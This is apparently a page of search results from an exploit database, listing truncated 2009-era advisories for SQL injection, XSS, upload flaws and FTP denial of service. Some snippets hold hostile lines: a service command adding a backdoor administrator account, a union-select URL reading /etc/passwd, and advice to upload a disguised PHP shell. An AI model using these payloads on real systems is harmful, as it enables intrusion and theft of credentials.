1634 matches found
phpMDJ 1.0.3 - SQL Injection
,--------------------------------------------------------------, Vulnerable Script : phpMDJ 1.0.3 \ Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip \ Vulnerability : Remote Sql Injection \ '--------------------------------------------------------------'...
DS CMS 1.0 - 'NewsId' SQL Injection
Script : DS CMS 1.0 NewsId Remote SQL Injection Vulnerability Script site : http://cms.dsinternal.com/Home AUTHOR : Palyo34 HOME : http://www.1923turk.biz ======================================================= +++++++++++++++++++++++ Exploit +++++++++++++++++++++++...
DieselPay 1.6 - Cross-Site Scripting / Directory Traversal
source: https://www.securityfocus.com/bid/37564/info DieselPay is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. An attacker could exploit these vulnerabilities to obtain sensitive information,...
Webring - Cross-Site Scripting
Webring - Cross-Site Scripting ======================================================================================== | Title : webring Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria...
Quiz - Cross-Site Scripting
======================================================================================== | Title : quiz Cross Site Scripting Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -00213771818860 | | EDB-ID : 10679 | |...
Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (1)
Uploader by CeleronDude 5.3.0 - Upload Vulnerability Discovered by : Stink' Date : 2009-12-17 Dork : "Uploader by CeleronDude." Website Publisher : http://www.celerondude.com/php-uploader-v5 -- Upload Vulnerability -- Rename your shell.php in shell.php.pjpeg and Upload ! Exemple for admin :...
Zeecareers 2.0 - Cross-Site Scripting Authentication Bypass
Zeecareers 2.0 - Cross-Site Scripting Authentication Bypass source: https://www.securityfocus.com/bid/41689/info Zeecareers is prone to a cross-site scripting vulnerability and multiple authentication-bypass vulnerabilities. An attacker may leverage the cross-site scripting issue to execute...
XM Easy Personal FTP Server 5.8.0 Remote DoS Vulnerability
No description provided by source. Date of Discovery: 24-Nov-2009 Credits:leinakesiatgmail.com Vendor: Dxmsoft Affected: XM Easy Personal FTP Server 5.8.0 Earlier versions may also be affected Overview: XM Easy Personal FTP Server failed to handle more than 2000 files or folders in the root...
PHP and ASP upload vulnerability exploit-vulnerability warning-the black bar safety net
1 pass exploit the principles just for the form format of the upload of asp and php scripts ncnetcat For the submission packet the dos interface to run under: nc-vv www.. com 8 01.txt -vv: echo 8 0: the www port 1.txt: is your data packet to be transmitted use of more methods, please check this...
Home FTP Server 'MKD' Command Directory Traversal Vulnerability
Date of Discovery: 17-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server is an easy use FTP server Application. Directory Traversal...
Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability
Date of Discovery: 16-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server FTP Server is an easy use FTP server Application. Denial of...
Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service
Exploit Title: Home FTP Server 1.10.1.139 'SITE INDEX' Command Remote Denial of Service Vulnerability Date: 16 Nov 09 Author: zhangmc Software Link: http://downstairs.dnsalias.net/files/HomeFtpServerInstall.exe Version: Home FTP Server 1.10.1.139 Tested on: relevant os Code : From: zhangmc mail...
tomcat: XSS in Apache Tomcat calendar application
Cross-site scripting XSS vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, relat...
Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /ad...
Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation
No description provided by source. To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available: sc stop "AdobeActiveFileMonitor8.0" sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add net...
SUSE: Security Summary (SUSE-SR:2009:017)
The remote host is missing updates announced in advisory SUSE-SR:2009:017. SuSE Security Summaries are short on detail when it comes to the names of packages affected by a particular bug. Because of this, while this test will detect out of date packages, it cannot tell you what bugs impact which...
SLES9: Security update for Apache2
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: apache2-worker apache2-prefork apache2-example-pages apache2 apache2-devel apache2-doc libapr0 For more information, please visit the referenced security...
SLES9: Security update for XFree86-server
The remote host is missing updates to packages that affect the security of your system. One or more of the following packages are affected: XFree86-Xnest XFree86-Xvfb XFree86-server More details may also be found by searching for keyword 5012942 within the SuSE Enterprise Server 9 patch database...
Cour Supreme - SQL Injection
Cour Supreme - SQL Injection ================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select...
cour supreme 'index.php' SQL Injection & Local File Include Vulnerability
================================================= Discovered By: CrAzY CrAcKeR Email: CrAzYCrAcKeRathotmaildotcom ================================================ example:- http://www.example.in/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,loadfile'/etc/passwd',8+from+mysql.user...